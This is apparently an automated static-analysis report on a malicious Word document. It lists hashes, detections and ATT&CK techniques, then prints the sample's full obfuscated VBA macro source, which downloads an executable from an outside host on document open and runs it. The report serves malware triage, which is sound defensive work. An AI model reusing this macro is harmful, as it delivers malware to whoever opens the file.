Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 182c15380350a636…

MALICIOUS

Office (OLE)

67.5 KB Created: 2016-05-12 00:52:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: 15668e62d79bb5d6566f8d0978025121 SHA-1: 5cce126e7213803b059687a81aa0db45cab0ca94 SHA-256: 182c15380350a636e948133dbcc07a23e6c4f43fab27772b8d48a15f2e729c07
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for malicious documents. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to execute commands or download additional content. The obfuscated nature of the VBA code and the presence of a benign-looking URL that is likely a placeholder or misdirection point towards a downloader or dropper functionality.

Heuristics 11

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim GkJzXt As String, qqQWMQOv As Integer
    Set KAhKKpGlzU = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function JXBzmLfW() As Object
    Set JXBzmLfW = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim AyqGqXefQ As String
    igJOtE = CallByName(njYPWrJSMM, ldaWc, 2)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim mttSwvbe As Integer
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x40 bytes
    Disassembly
    Attempted x86 opcode disassembly
    000023FE  40                inc eax
    000023FF  40                inc eax
    00002400  40                inc eax
    00002401  40                inc eax
    00002402  40                inc eax
    00002403  40                inc eax
    00002404  40                inc eax
    00002405  40                inc eax
    00002406  40                inc eax
    00002407  40                inc eax
    00002408  40                inc eax
    00002409  40                inc eax
    0000240A  40                inc eax
    0000240B  40                inc eax
    0000240C  40                inc eax
    0000240D  40                inc eax
    0000240E  40                inc eax
    0000240F  40                inc eax
    00002410  40                inc eax
    00002411  40                inc eax
    00002412  40                inc eax
    00002413  40                inc eax
    00002414  40                inc eax
    00002415  40                inc eax
    00002416  40                inc eax
    00002417  40                inc eax
    00002418  40                inc eax
    00002419  40                inc eax
    0000241A  40                inc eax
    0000241B  40                inc eax
    0000241C  40                inc eax
    0000241D  40                inc eax
    0000241E  40                inc eax
    0000241F  40                inc eax
    00002420  40                inc eax
    00002421  40                inc eax
    00002422  40                inc eax
    00002423  40                inc eax
    00002424  40                inc eax
    00002425  40                inc eax
    00002426  40                inc eax
    00002427  40                inc eax
    00002428  40                inc eax
    00002429  40                inc eax
    0000242A  40                inc eax
    0000242B  40                inc eax
    0000242C  40                inc eax
    0000242D  40                inc eax
    0000242E  40                inc eax
    0000242F  ffc0              inc eax
    00002431  0011              add byte ptr [ecx], dl
    00002433  0800              or byte ptr [eax], al
    00002435  7800              js 0x2437
    00002437  96                xchg esi, eax
    00002438  0301              add eax, dword ptr [ecx]
    0000243A  2200              and al, byte ptr [eax]
    0000243C  0211              add dl, byte ptr [ecx]
    0000243E  0103              add dword ptr [ebx], eax
    00002440  1101              adc dword ptr [ecx], eax
    00002442  ffc4              inc esp
    00002444  007900            add byte ptr [ecx], bh
    00002447  0100              add dword ptr [eax], eax
    00002449  0202              add al, byte ptr [edx]
    0000244B  0301              add eax, dword ptr [ecx]
    0000244D  0000              add byte ptr [eax], al
    0000244F  0000              add byte ptr [eax], al
    00002451  0000              add byte ptr [eax], al
    00002453  0000              add byte ptr [eax], al
    00002455  0000              add byte ptr [eax], al
    00002457  000406            add byte ptr [esi + eax], al
    0000245A  03                .byte 0x03
    0000245B  05                .byte 0x05
    0000245C  0207              add al, byte ptr [edi]
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9063 bytes
SHA-256: 491da5bc70e68e2bcfc429751d331e78be923dfee5123b6ac4caff3c1d8f1f8b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
173 of 246 identifiers look randomly generated (e.g. 'SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function JqSvkGCPGA() As Integer
hFrQPtBp
iOEGGBQELK
JqSvkGCPGA = 4779
End Function
Private Sub Document_Open()
Dim mttSwvbe As Integer
wyGWpY.pbSZCXhmSD
End Sub
Private Sub HgMddfJ(ByVal wnaYy As Integer)
kKhjcbO
If kbFfJcWPDT("fJB17jk5p", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "RlRkIP7MU19", 762
End If
End Sub
Private Sub tboKsvkN(ByVal QFlarOMYH As Integer, ByVal HPkFLb As Integer)
WbFWObBP
End Sub
Private Sub WYPBWcKU(ByVal rPhzMg As String, ByVal wcQpWQl As Boolean)
hpyzkXXV "8XydRQkTGiMrmox", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "B0xDIQATZFOts"
KvgAFCY
HSewNUUfX "B7djm91Oy"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub

Attribute VB_Name = "Ithby"
Private Function GbkVYXuh() As Boolean
puBqPC False, "kaC5cYrlDrvDp"
GbkVYXuh = True
End Function
Private Sub DYnUp(ByVal UrZpgn As String, ByVal PNDGAns As Integer)
oRQsMB
End Sub
Public Function WMJcdb(ByVal vBbzbEV As String, ByVal aJqFS As String) As String
Dim qqqGmed As Boolean, JgXpwpW As String
For zNoozTBlcV = 1 To Len(vBbzbEV)
qqqGmed = yohIEvNDuU.jpjwnKChj(yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV), aJqFS, 638)
MWgdETofR = 5559
If Not qqqGmed Then
WMJcdb = WMJcdb & yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV)
LICDvxAOy = 7085
End If
Next
End Function
Private Function TepKJZzNjv() As Boolean
RiNRh 3745
TepKJZzNjv = True
End Function
Private Function PgqZWnW(ByVal ibMyK As Integer, ByVal xpnMVUt As Integer) As String
wzDcvaHzAL "kI526hU65u"
lLNzEN 414
yvqqniWt 6874, False, True
PgqZWnW = "3olpYJqw9J3n"
End Function

Attribute VB_Name = "SdkIZOeRT"
Public Function igJOtE(ByVal njYPWrJSMM As Object, ByVal ldaWc As String) As Variant
Dim AyqGqXefQ As String
igJOtE = CallByName(njYPWrJSMM, ldaWc, 2)
End Function
Public Sub pOJmNb(ByVal yClPgtlq As Variant, ByVal PSoJbKoEba As Variant, ByVal bxDAQNTzFR As String, ByVal oSHsWLUbG As Object)
CallByName oSHsWLUbG, bxDAQNTzFR, 1, yClPgtlq, PSoJbKoEba
End Sub
Public Sub ISoSx(ByVal kHdGTYNKtC As String, ByVal eqBYT As Integer, ByVal nHPJawCsAX As Object, ByVal WApkqBkVA As Variant, ByVal XQkBMm As String)
Dim wekeFAKS As Boolean, YoAekV As String
CallByName nHPJawCsAX, kHdGTYNKtC, 1, WApkqBkVA
End Sub
Public Sub nyVis(ByVal CosRCSg As String, ByVal LOMaAFXq As Object)
Dim OLqsgyKydz As Integer, klFXu As Integer
CallByName LOMaAFXq, CosRCSg, 1
End Sub
Public Sub nBEdpfoE(ByVal KwfoJtk As Variant, ByVal WFHGLp As Variant, ByVal wlFegzlvgk As Boolean, ByVal nczauBS As Variant, ByVal yCUkSvZ As String, ByVal SPWDW As Object)
Dim KYLDLixc As Boolean
OWoNkkz = "AQJOV7YRmX5yV"
CallByName SPWDW, yCUkSvZ, 1, WFHGLp, nczauBS, KwfoJtk
End Sub
Public Function kwcXIuGy(ByVal aWlnczuLx As String, ByVal iROcCO As Boolean, ByVal TjNlOT As Integer, ByVal SPWDW As Object, ByVal IuNfhZ As String) As Variant
Set kwcXIuGy = CallByName(SPWDW, aWlnczuLx, 2, IuNfhZ)
End Function
Public Sub LrnQauZ(ByVal hlUbE As Integer, ByVal LwsvZ As String, ByVal ycGOStjrZ As Integer, ByVal vHzOKu As Variant, ByVal DHNjqjc As Object)
Dim kWSBuH As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName DHNjqjc, LwsvZ, 4, vHzOKu
End Sub

Attribute VB_Name = "tvRhy"
Public Function JXBzmLfW() As Object
Set JXBzmLfW = CreateObject("ADODB.Stream")
End Function
Public Function UXVspUID() As Object
Dim pOOVI As Integer
Set UXVspUID = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function KAhKKpGlzU() As Object
Dim GkJzXt As String, qqQWMQOv As Integer
Set KAhKKpGlzU = CreateObject("WScript.Shell")
End Function

Attribute VB_Name = "wyGWpY"
Private Function QXrMrsQ() As String
QXrMrsQ = Ithby.WMJcdb("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function scjAPmCwO() As String
Dim lGbQqfR As Integer
Dim IhUBVCEbAW As Boolean
scjAPmCwO = bYQQFY(FREjEkH, towxipv, towxipv) & SKxccKIV
End Function
Private Sub hvlgmlO(ByVal wyWIWLuRIj As String, ByVal WUBDjJ As Boolean, ByVal PuKhJZxo As Integer, ByVal BusaGxT As Variant)
Dim IHZRneyP As Boolean, CwzbrzK As Integer
Set QhWGb = tvRhy.JXBzmLfW
SdkIZOeRT.LrnQauZ 708, Ithby.WMJcdb("Taayqpae", "7qa."), 3110, 1, QhWGb
SdkIZOeRT.nyVis Ithby.WMJcdb("OXpresns", "r.Xtsu"), QhWGb
SdkIZOeRT.ISoSx Ithby.WMJcdb("EWrQi3EteE", "3QEN"), 6128, QhWGb, BusaGxT, fvzkjXLk
SdkIZOeRT.pOJmNb wyWIWLuRIj, 2, xAOKQ, QhWGb
SdkIZOeRT.nyVis VajxKpN, QhWGb
End Sub
Private Sub xdPBYHjHn()
Dim yDPim As Boolean, OBfNwD As String
On Error GoTo lcLlmF
CrqRpOlM 2612, scjAPmCwO, SilHR
NHFOEgVeoo scjAPmCwO
RPCxFN = "z33eikgFE"
Exit Sub
vkLGZ = 5682
lcLlmF:
End Sub
Private Function fvzkjXLk() As String
fvzkjXLk = "Hm9PzpqXM8Tk"
End Function
Private Sub NHFOEgVeoo(ByVal miSGHSYuNw As String)
SdkIZOeRT.ISoSx zyGqC, 6128, tvRhy.KAhKKpGlzU, miSGHSYuNw, XNPJQFXYf
End Sub
Private Function XNPJQFXYf() As String
XNPJQFXYf = "Jq6p51kMY"
End Function
Private Function bYQQFY(ByVal GSaGv As String, ByVal UTbiy As String, ByVal ypnxtROJG As String) As String
Dim FFDtdQ As String
JixRwEJkN = False
Set ectSqGDH = SdkIZOeRT.kwcXIuGy(Ithby.WMJcdb("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, tvRhy.KAhKKpGlzU, Ithby.WMJcdb("wPR6Od6CdESwiS", "xdtw6i"))
bYQQFY = ectSqGDH(GSaGv)
End Function
Private Function SilHR() As String
Dim MpmvU As Boolean
Dim exxvbLptH As Boolean
SilHR = gOwGIDiAO
End Function
Private Function haUcDjaieH() As String
NXgcHedZ = "lJXprLrLKbix"
haUcDjaieH = Ithby.WMJcdb("S2Ce2nd2", "2Co")
End Function
Private Function gOwGIDiAO() As String
gOwGIDiAO = Ithby.WMJcdb("hPCtEtEp:b/IP/oblPCcCabyEfobtEoEPgErIabf.IcEoYmC/bsbybCsEtIeCm/CPcaEPcbhYe/bwCYoCrEdP.eYExeC", "IPCEbY")
End Function
Private Function SKxccKIV() As String
Dim bZoLtgFpw As String
SKxccKIV = JupTi
End Function
Private Function VajxKpN() As String
VajxKpN = Ithby.WMJcdb("Ciliopiske", "tkpi")
End Function
Private Sub Kqnuz(ByVal dlxdZiiDh As Integer, ByVal olcBEYEmB As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "tf0zmSAodfN"
End Sub
Private Function zyGqC() As String
JywcHztmR = "d4OR3A9CGIEikH"
zyGqC = Ithby.WMJcdb("rEWxteWc", "1rWt")
End Function
Private Function YnBzQ() As String
If pjTUCKd(5843, "woONT25Thy") Then
zeMphePZDz 1173, "I2g1yWKwm"
zUtoVINdP 2806, "la8LZGheRu", 559
jvyLJjMjyn
End If
YnBzQ = "DBI3Lm69ouaxgNX"
End Function
Private Function XvQcr() As String
XvQcr = Ithby.WMJcdb("VMQoVziGlQlQQav/5Vv.Q0 QQ(QcVoQmpvaVtQviGbGlVeV; GMGGSIvvEV 9V.vG0;VV WViQGnvdoQwQVsv NQVTG 7Q.QG1V;Q TvvriQdVevnvGt/GQ5G.G0)v", "vVQG")
End Function
Private Function jEAYTHsh() As String
jEAYTHsh = Ithby.WMJcdb("OXpresns", "r.Xtsu")
End Function
Private Sub CrqRpOlM(ByVal tAAsHrFZ As Integer, ByVal eFaIBUyeVu As String, ByVal RYojJhb As String)
Dim FWmFFOn As Integer, QmSSGLrIL As Integer
Set SwsQIpxEC = tvRhy.UXVspUID
vAhuigCxLB = "6Z6ITHFTp"
SdkIZOeRT.nBEdpfoE False, Ithby.WMJcdb("6GE Ta", " a96S"), False, RYojJhb, jEAYTHsh, SwsQIpxEC
SdkIZOeRT.pOJmNb Ithby.WMJcdb("U.sNeTNrN-ANgNTenNt.", "mT.N"), XvQcr, Ithby.WMJcdb("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), SwsQIpxEC
SdkIZOeRT.nyVis haUcDjaieH, SwsQIpxEC
hvlgmlO eFaIBUyeVu, True, 3347, SdkIZOeRT.igJOtE(SwsQIpxEC, QXrMrsQ)
End Sub
Private Function JupTi() As String
JupTi = Ithby.WMJcdb("P/cF3w8B7P6FBdF00pdF7hh3dB.FeFxFPe", "wBhPFp")
End Function
Public Sub pbSZCXhmSD()
Dim BCcHV As Integer
xdPBYHjHn
End Sub
Private Function OsKGshuod() As Integer
WmkFh
cIsPekWV 9366
OsKGshuod = 9266
End Function
Private Function towxipv() As String
towxipv = "DISj4y0ywL7NH7g"
End Function
Private Function xAOKQ() As String
xAOKQ = Ithby.WMJcdb("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function FREjEkH() As String
FREjEkH = Ithby.WMJcdb("ZTEZIMPZ", "ZoWIO")
End Function

Attribute VB_Name = "yohIEvNDuU"
Private Sub pUdTu(ByVal aqxVWbfR As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub nUSoQrDd()
UKUhJchCfN False
UOlvZCoKSe "kzpKzUEINlR4N", 3119
BWDat "xpqAZayG7hMN"
End Sub
Private Function ddtCtq(ByVal FCWjcNQVF As String, ByVal vuVaS As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
ddtCtq = True
End Function
Private Sub VlzvwFRdHT(ByVal LCDzSSLr As Boolean, ByVal jCFsafeZa As String)
mokZnpH
HulbI "OGUUM2KcfmcPa"
End Sub
Public Function jpjwnKChj(ByVal sXfnOZpB As String, ByVal XApeM As String, ByVal WGDoQDr As Integer) As Boolean
Dim LuJmzfrRdU As Boolean
jpjwnKChj = InStr(1, XApeM, sXfnOZpB)
End Function
Public Function jdqox(ByVal RKlkWqrIQ As String, ByVal YXFBGbGx As Integer) As String
Dim auYmv As Boolean
Dim tAzuDfeyPm As Boolean
jdqox = Mid(RKlkWqrIQ, YXFBGbGx, 1)
End Function